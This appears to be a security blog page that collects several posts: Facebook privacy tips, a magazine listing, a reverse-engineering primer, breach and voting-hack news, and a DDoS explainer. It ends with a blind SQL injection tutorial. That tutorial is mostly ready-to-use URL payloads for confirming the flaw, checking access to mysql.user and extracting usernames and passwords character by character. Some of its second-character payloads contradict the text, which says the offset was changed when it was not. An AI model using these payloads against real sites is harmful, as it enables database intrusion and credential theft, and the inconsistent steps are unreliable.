5 ways to secure your Facebook profile in a post

5 ways to secure your Facebook profile in a post-Timeline world

With the ongoing rollout of Facebook's Timeline feature, security and privacy have never been more important to your digital life. The new layout presents all of your current and past activities on Facebook -- posts, photos, comments, likes and so on -- in a handy timeline format to anyone with access to your profile, which may include friends of friends, colleagues, executives at your company, a potential future boss ... well, you get the idea.

If you've made the jump to Timeline -- and if you haven't, you will within the next few weeks, like it or not -- you should know that Facebook has changed a few things, and there are certain settings you need to pay attention to if you're concerned about what parts of your life others can see. Here's how to lock down your profile in the post-Timeline world.

 

1. Limit your connections

Most key privacy settings are accessible by clicking the arrow in the upper right-hand corner of your profile screen (next to your name and the Home button). From here, select Privacy Settings in the drop-down menu.

Click on Edit Settings next to the How You Connect option to begin your profile lockdown. This section contains five privacy settings.

  Limit who can find you, contact you and post to your timeline.

The first three settings govern who can look up your profile and see your contact information, who can friend you and who can send you messages. For maximum privacy, change the first and third settings to Friends, thereby preventing anyone else from looking up your profile or sending you messages.

The second setting governs who can send you Friend requests. The more secure choice is Friends of Friends, but it limits your connectivity on the world's largest social network. If you're worried about losing out on friendship opportunities, keep it set to Everyone.

The last two settings dictate who can post on your timeline and who sees those posts. Only Me is the safest option, but choosing it severely reduces the number of interactions Facebook offers. If you're seriously considering limiting your timeline posts to you and only you, it might be time to leave Facebook entirely.

Setting both of these options to Friends is relatively safe while still allowing the sharing that makes Facebook fun. And there is a way to review posts from friends before they appear on your timeline, as you'll see in the next section of the story.

2. Tailor your tags

An easily missed entry in the Privacy Settings is one innocuously labeled How Tags Work. However, it is essential to tweak the settings found here if you want to take control of your profile's privacy, as some tagging actions can be pretty invasive.

The first two settings (Timeline Review and Tag Review) are particularly useful. When you enable them, you can review posts and photos that friends tag you in, as well as the tags friends add to your own posts -- all before this information goes public. That's especially valuable if you have well-meaning friends who think tagging you in those Vegas party photos is a good idea.

Enabling Timeline Review lets you vet posts you're tagged in before they appear on your timeline.

The third setting, Maximum Timeline Visibility, should be set to Friends or customized for certain friend lists or networks to ensure that these tagged posts, once approved, aren't seen by everyone.

Disable the fourth setting on the list, Tag Suggestions. It makes it harder for friends to tag large quantities of photos featuring you or people that look like you. But it also takes some of your profile's privacy out of the hands of others.

The last setting on the list is seriously important: It determines whether or not friends can check you in to places. Turn it off. The only thing worse than constantly broadcasting your location is having someone else do it without your express permission.

3. Rein in app permissions

Speaking of permissions, the permission window that used to appear frequently when Facebook apps wanted to access your profile information is pretty much MIA now. Currently, apps need to ask you only once for permission. Once they do, they'll mine your profile information as often as need be, sometimes even when the app isn't being used.

Fortunately, there's a privacy fix. Unfortunately, it's not a quick one, since you'll have to tweak each app's settings individually.

In the main Privacy Settings, click on Edit Settings next to the Apps and Websites entry to bring up the Apps, Games and Websites privacy settings page. Next to "Apps you use," click on Edit Settings again to access a full list of apps running on your profile. Each app is accompanied by an Edit button, which displays the app's permissions when clicked. Each app has different permissions enabled, so you'll have to check each one individually.

Check each of your Facebook apps to see what permissions it demands.

Here's the bad news: Some permissions, such as sharing basic profile information with the app, cannot be altered. These are marked by the grayed-out word "Required" next to the particular permission.

Other settings, however, have the word "Remove" next to them -- click on it to remove any permission. These are the only items that can be changed, so you'll have to take a hard look at what permissions an app deems a necessity. If you don't like what you see, click "Remove app" at the top of the same page and learn to live without that app.

For the apps you do keep, it's important to control who sees the information that the apps share -- many of them are designed to broadcast your activities on your timeline and in the "ticker" on the right side of users' home pages. At the bottom of each app's permissions page is another important option entry titled "App activity privacy." Click on the drop-down menu and select Only Me to be sure your app activity isn't seen by anyone else.

Similarly, if you install any new apps, be sure to select Only Me under "Who can see activity from this app on Facebook" on the installation page.

4. Stop others from taking your information with them

The Apps, Games and Websites privacy settings also contain some other features that security hounds would be wise to disable.

Click on Edit Settings next to the entry labeled "How people bring your info to the apps they use." Other users may be able to bring your personal information with them when they use apps and websites. It's all in the interest of making things more social. It can also be invasive. Uncheck the box next to each information category listed (there are 17 of them) to prevent others from using your personal data.

Prevent others from using your personal information in apps and on other websites.

Head back to the Apps, Games and Websites privacy settings and click Edit Settings for the "Instant personalization" category. This option should be turned off by default, but check to make sure. You'll first see a pop-up screen explaining the feature; when you close that, you'll be able to see whether it's enabled. If it is, disable it. This will prevent Facebook partner sites from accessing your public information to personalize your experience on their own websites.

5. Reduce your social footprint

Sharing is the whole point of Facebook, but the Timeline layout sometimes takes this to extremes, making it easy for others to see all your activity from years gone by. The good news is that you can disable Recent Activity updates, which broadcast new friendships, groups you've joined and any other changes in your basic information (such as relationship status or political views). Just click on the X next to a Recent Activity update on your timeline and select Hide Similar Activity from Timeline.

This makes the process of hiding certain activities from your past a little easier. But here's the bad news: Individual status updates or posts from, say, your less judicious days need to be removed individually by clicking the pencil icon next to each item and choosing Hide from Timeline -- a process that could take you to the end of 2012 if you've ever been very active on Facebook.

There's a limited solution, though: In the main Privacy Settings window, the second-to-last entry on the list is titled Limit the Audience for Past Posts. Click on the Manage Past Post Visibility link next to it. A window will appear giving you the option to change all past posts so that they're visible only to friends. Click Limit Old Posts to do so.

That will at least prevent anyone other than people you've friended from seeing older items on your timeline. But considering that your boss, colleagues and other acquaintances may be among your Facebook friends, it's still a good idea to review your entire timeline and remove compromising status updates, comments, links and photos. Start with the oldest items first. When you first started using Facebook, you probably had fewer contacts and might have posted and commented with less caution than you've done more recently.

Limit your posts to friends -- or a select group of friends.

As a last precaution, make sure that everything you post on Facebook moving forward is shared only with friends, specific networks or friend lists: Click the drop-down box next to your status update, comment, link or other shared content and select Friends or a group. For even more granular control over who can and can't see a post, select the Custom option.

It bears mentioning that the last and best defense against digital privacy invasions is common sense. You may want to be a bit irreverent with your Facebook friends -- and there's nothing wrong with that. But ask yourself if you'd wave that questionable photo or say that pithy comment in front of someone who could affect your future hiring prospects. If not, think twice before you post it on Facebook.

Get a PenTest Magazine Issue 2

Separating Fact from Fiction – The realities of Cyber War
By Don Eijndhoven
Cyber War. Two words that you’ll have heard in the news a few times by now. You’ll have heard it more and more over the last year or so. Maybe two or three years if you’ve been halfway interested or happened to be browsing on IT websites that cover cyber warfare. Especially if you’re living in the US, you’ll have heard some pretty fear-inducing stories. And not by just anybody; Richard Clarke himself has said that a Cyber War is the next big threat to national security. He was, of course, referring to the national security of the US, but his critique certainly holds water for other modernized nations. What may be surprising is that he was absolutely right, even though he may be understood poorly.

Multifactor Authentication – A Requirement for the 21st Century
By Robert Keeler
Logon credentials as the only method of granting access to today’s valuable data is far from an acceptable 21st century solution. There is no doubt that the lack of serious authentication for the last decade has created much of the opportunity for the theft of information which has led to identity theft becoming an epidemic. Other than granting initial access, there is no monitoring of a user’s true identity during transaction processing online. There is no forced logout when the user has completed their task. There is no security when Man-in-the-middle attacks can easily penetrate the weaknesses of simple logon credentials being the primary access control to vasts amounts of data.

Regulatory Compliance under the Indian Cyber Laws
by Sagar Rahurkar
The Information Technology Act, 2000 (IT Act) is the primary law in India governing “cyberspace”. It is in force from 17th October, 2000 and IT (amended) Act, 2008 is in force from 27th October, 2009 making significant changes in the original Act. Amendments for the first times have introduced the concept of “Regulatory compliance” under the law for the protection of “Sensitive personal information”.

Ride the Dragon: Testing the Desktop by adopting criminal tools and strategies
by Stefano MacGalia
A usual Pen Testing engagement limits its perimeter of action to exploit specific vulnerabilities identified during phases and, by collecting the results, it ends with a positive or negative occurrence that will be included in the final report by the tester.
This means that, by the Customer point of view, in case of a positive result: the presence and exploitability of a specific weakness, the corrective action will be suggested and probably enforced lately.

Social Engineering
by Falgun Rathod

What if someone ask you for a Password Will you give it? Yes / No You will say Obviously No but this is What I call Social Engineering. According to Wiki “Social Engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.”Social Engineering is not a new thing at all it’s the art of lie and to get confidential information to access/Hacked into System.

Benefits of Attribution
by Sayngeun Phouamkha
A good friend by the name of “J” once told me in my very early stages of learning IT Security that, ” The enemy of my enemy is my scapegoat.” Of course knowing nothing of IT Security or the different arenas/specialties of which this field encompasses I had to have him explain in depth and in very non-IT Security terms exactly what that meant and why it was important to know in this line of work.

Attacking POS: history, technique and a look to the future

When we talk about credit and debit card we should remember that this kind of payment was think and launched after the second war from American Express and the card as we know with magstripe was introduced in the market from 1979. Since the beginning of the ’90 years we’ve seen an increase in card fraud, before using the ATM terminals and subsequently affecting the Point of sale terminals (POS). Before talk about fraud we will try to understand how is composed a credit or debit card.

Click Here to Download - https://www.owasp.org/images/7/7b/PENTESTMAG2.pdf

Reverse Engineering Introduction

What is Reverse Engineering?

Have you ever noticed, Nokia or Iphone made an application and after few days you find that on Samsung or any other mobile device. Its nothing that difficult, its called reverse engineering. They decode their programs to get the basic structure of the original program and then following the structure codes their own and sometimes doesn't even happen just make some code changes and uses them.

According to Wikipedia "Reverse engineering is the process of discovering the technological principles of a device, object or system through analysis of its structure, function and operation. It often involves taking something (e.g., a mechanical device, electronic component, biological, chemical or organic matter or software program) apart and analyzing its workings in detail to be used in maintenance, or to try to make a new device or program that does the same thing without using or simply duplicating (without understanding) the original".

Ahh.. more technology related. I will explain you in better way. As the name suggest reverse engineer means if have something already made, in computer field say exe installer file. Now what reverse engineering is, decoding the exe in such as fashion that we will get original source code or some what near to it. Consider an example, you have a wall made of bricks, here bricks are base material to build the wall. Now what we want to do is we want to obtain all the bricks from the wall. Similarly we have an executable or dll file and we know programs are made from coding only, so source codes are base material in building executable. So we want to obtain the source code from the executable or some what near to it. As when you break wall also to get the bricks some bricks are also got broken and that's all depend type of material used to fix or mend bricks to make the wall. Similarly the retrieval of source code from executable depends upon how securely software is being packed and type of cryptography or packer is used by its designer.

I hope now you have got what exactly reverse engineering is.

What is the use or benefit of Reverse Engineering?

I can guarantee most of internet users use cracks or keygens or patches. Have you ever tried to understand how they are made. Ahhh... I know you haven't. So let me give you clear information. All the keygens or cracks or patches of software's are made by technique called Reverse Engineering. Oops... I was going to tell the benefits.. what i am telling...negative features... But these are features of reverse engineering my friends and most commonly used by all famous organizations as its a part of their Program promoting methodolgy.

Other Beneficial Uses of Reverse Engineering:

• Product analysis: To examine how a product works
• Removal of copy protection, circumvention of access restrictions.
• Security auditing.
• Extremely useful when you lost documentation.
• Academic/learning purposes.
• Competitive technical intelligence (understand what your competitor is actually doing, versus what they say they are doing).
• Last but not the least..Learning: learn from others' mistakes. Do not make the same mistakes that others have already made and subsequently corrected.

Common Terms Used in Reverse Engineering:

1. Debugger

2. Deassembler

3. Decompiler

4. Packers or Unpackers

5. Program Obfuscation

6. Hex Editing

7. Cryptography

I will explain these terms in detail in my next article. Till then you can explore these topics on internet so that you will have some prior knowledge of Reverse Engineering terms.

Note: Please use this Knowledge for your better understanding of Reverse Engineering and Study not to HARM anyone.

Me on Cover Page of International Security Magazine PenTest based in Europe

Falgun Rathod featured on Cover Page of PenTest Magazine

Social Engineering

What if someone ask you for a Password Will you give it? Yes / No You will say Obviously No but this is What I call Social Engineering. According to Wiki “Social Engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.”Social Engineering is not a new thing at all it’s the art of lie and to get confidential information to access/Hacked into System.

by Falgun Rathod

for more - http://pentestmag.com/auditingpentesting-standards-0212/

This is Beginning lots more to come :) ......  

NASA Hacked 13 times last Year

'Unencrypted notebook computers that have been lost or stolen include ones containing codes for controlling the International Space Station as well as sensitive data on NASA's Constellation and Orion programs and Social Security numbers'

NASA said hackers broke into its computer systems 13 times last year, stealing employee credentials and gaining access to mission-critical projects in breaches that could compromise U.S. national security.

The National Aeronautics and Space Administration spends only $58 million of its $1.5 billion annual IT budget on cyber security, Paul Martin, the agency's inspector general, told a Congressional panel on NASA security earlier this week.

"Some NASA systems house sensitive information which, if lost or stolen, could result in significant financial loss, adversely affect national security, or significantly impair our nation's competitive technological advantage," Martin said in testimony before the U.S. House Committee on Science, Space and Technology, released on Wednesday. (bit.ly/yQFSB8)

He said the agency discovered in November that hackers working through a Chinese-based IP address broke into the network of NASA's Jet Propulsion Laboratory.

He said they gained full system access, which allowed them to modify, copy, or delete sensitive files, create user accounts for mission-critical JPL systems and upload hacking tools to steal user credentials and compromise other NASA systems. They were also able to modify system logs to conceal their actions, he said.

"Our review disclosed that the intruders had compromised the accounts of the most privileged JPL users, giving the intruders access to most of JPL's networks," he said.

In another attack last year, intruders stole credentials for accessing NASA systems from more than 150 employees.

Martin said the agency has moved too slowly to encrypt or scramble the data on its laptop computers to protect information from falling into the wrong hands.

Unencrypted notebook computers that have been lost or stolen include ones containing codes for controlling the International Space Station as well as sensitive data on NASA's Constellation and Orion programs and Social Security numbers, Martin said.

Source - Reuters

Understanding DDOS Attack

What is DDos Attack ?

Compromised PCs, or “bots,” are formed into groups called “botnets” and are used as weapons by cyber-attackers to launch various forms of cyber attacks. These attacks range widely from DDoS to identity theft and clandestine intelligence gathering operations.
During Distributed Denial of Service attempts, attackers launch attacks using different techniques including HTTP, HTTPS, ICMP, SYN Floods, UDP Floods, DNS Request Floods, GET Floods, and others. The attack components are often used in combination, and range in size from a few hundred megabits per second (Mbps) to over 80 gigabits per second (Gbps). Increasingly sophisticated attacks are based around application requests at Layer-7.

Normally, DDOS consists of 3 parts . One is the Master ,Other the slave and atlast the victim. The master is the attack launcher ie the person/machine behind all this,sound’s COOL right . The slave is the network which is being compromised by the Master and Victim is the target site/server . Master informs the compromised machines, so called slaves to launch attack on the victim’s site/machine. Hence its also called co-ordinated attack.

How do they Do it ?

DDOS is done in 2 phases. In the first phase they try to compromise weak machines in different networks around the world. This phase is called Intrusion Phase. Its in the next phase that they install DDOS tools and starts attacking the victims machines/site. This Phase is called Distributed DoS attacks phase.

What Allowed them to Do ?

1. Vulnerable softwares/Applications running on a machine or network.
2. Open network setup.
3. Network/ machine setup without taking security into account.
4. No monitoring or DataAnalysis are being conducted.
5. No regular Audit / Software upgrades being conducted.

First Identify if you are really under attack. If yes, follow the below steps :

• Check if your machines load is high and you have large number of HTTP process running.

To find the load just use the command w or uptime -

–

Eg:

falgun@localhost>w 12:00:36 up 1 day, 20:27, 5 users, load average: 0.70, 0.70, 0.57

USER XYZ FROM LOGIN@ IDLE JCPU PCPU WHAT

–

To find if there is large number of HTTP process running use the command ” ps -aux|grep HTTP|wc -l ”

–

Eg:

[falgun@localhost]# ps -aux|grep HTTP|wc -l

23

–

In a heavy server , the number of connection will go above 100. But during DDOS attack, the number will go even higher and thats when we need to find out from which all networks are these attacks coming. In DDOS the host machine doesn’t have much importance. Its the network which is of importance here because, an attacker will use any machine on the compromised network or even will use all the machines in the network. Hence network address is of importance while fighting with the attack.

However, there are some actions you can take to protect yourself. Here's some basic advice:

• Ensure that you have adequate bandwidth on your Internet connection. You'll be able to foil many low-scale DDoS attacks by simply having enough bandwidth (and processing power) to service the requests.
• Deploy an intrusion prevention system on your network. Some (but definitely not all) DDoS attacks have recognizable signatures that an IPS can detect and use to prevent the requests from reaching the Web server.
• Use a DDoS prevention appliance, including any of the Cisco Systems Inc. Cisco Guard products, that is specifically designed to identify and thwart distributed denial-of-service attacks.
• Maintain a backup Internet connection with a separate pool of IP addresses for critical users. While you won't be able to switch all access to your website over to a backup connection (the attacks will switch at the same time!), you can provide critical users with an alternate path to your site if the primary circuit is swamped with bogus requests.

These tips should get you started on the road toward building a hardy Web infrastructure with the highest probability of surviving a DDoS attack. Good luck!

Small Coding Mistake Lead to an Internet Voting System Failure

The main security weakness that let University of Michigan researchers take control over a planned city of Washington, D.C. Internet voting system pilot for overseas voters in 2010 was "a tiny oversight in a single line of code," the researchers say in a new paper (.pdf) detailing their exploits. City officials canceled the pilot shortly before the November election after the hack was revealed.

It's evidence, say the researchers--led by Assistant Professor J. Alex Halderman--that Internet voting should be postponed until, when or if major new breakthroughs in cybersecurity occur. Mistakes like the one they exploited are all too common, hard to eradicate, and indicative of a brittleness in web applications, they say. Seemingly trivial errors can result in attackers gaining system dominance--and in the case of an internet voting system, controlling the outcome of an election.  

Responding to a call by Washington, D.C., election officials for outsiders with no previous access to test system security, Halderman and his students penetrated the pilot system within 48 hours of it going online. Their successful attack went undetected for another 36 hours, they say, despite the fact that they left a calling card in the form of having the vote confirmation screen to play the University of Michigan fight song after 15 seconds. Even then, the detection didn't occur because D.C. officials spotted anomalies in intrusion detection system logs, or even stumbled on the fight song itself, but because someone on a mailing list monitored by the city asked, "does anyone know what tune they play for successful voters?"  

The main exploit researchers used was a shell-injection vulnerability done by uploading a fake ballot with a command function as the file extension. The file uploader plugin D.C. election officials used preserved the file extension and the command line interpreter executed the command, the paper says.

Attackers also found that a system firewall filtered outbound network traffic, but that they could steal data by sending files to the images directory on the compromised server and retrieving it with any HTTP client.

Once inside the application server, they retrieved the public key for encrypting ballots, proceeding to replace all encrypted stored ballot files with forged votes. They also modified the system so that new ballots were sent to a subfolder in the images directory and the new originals replaced with more forgeries.

They also managed to violate the secrecy of balloting, the paper says, since before ballots were encrypted, the file uploader placed them in a temporary directory. But, the web application didn't delete the unencrypted ballots. The files did not contain a voter's identification, but did display the precinct and time of voting, letting researchers compare them to server application logs and associate them with people's identities.

In maybe the greatest oversight of city officials, researchers also found in the temporary director a 937 page .pdf document containing real voters' credentials for using the system, meaning that attackers could have cast votes as those citizens in the real election.

"One small mistake in the configuration or implementation of the central voting servers or their surrounding network infrastructure can easily undermine the legitimacy of the entire election" they conclude.

For more:
- download the paper from J. Alex Halderman's website (.pdf)
Source - http://www.fiercegovernmentit.com/story/small-coding-mistake-led-big-internet-voting-system-failure/2012-02-22 - 

Blind SQL Injection Tutorial Illustrated

Blind injection is a little more complicated the classic injection but it can be done :D 

It's some what hard but good to Learn 

1) http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc... then when we want to test it for blind sql injection attack

2) http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.now the real test

3) http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.Hacker's Work Started :) 

1) Get the MySQL version

to get the version in blind attack we use substring 

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.replace 4 with 5, and if query return TRUE then the version is 5. 

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works 

when select don't work then we use subselect 

i.e

http://www.site.com/news.php?id=5 and (select 1)=1 

if page loads normally then subselects work.then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names.This is part when guessing is the best friend for Hacker ...

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.

if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name. 

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e.

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess) 

here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users. 

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value and then compare it with simbol greater then > .

 so if the ascii char greater then 80, the page loads normally. (TRUE)

 we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

 so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

 There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

 cause that makes you better SQL INJECTOR :D

Hope You Learned alot from this and This is just for Educational Purpose.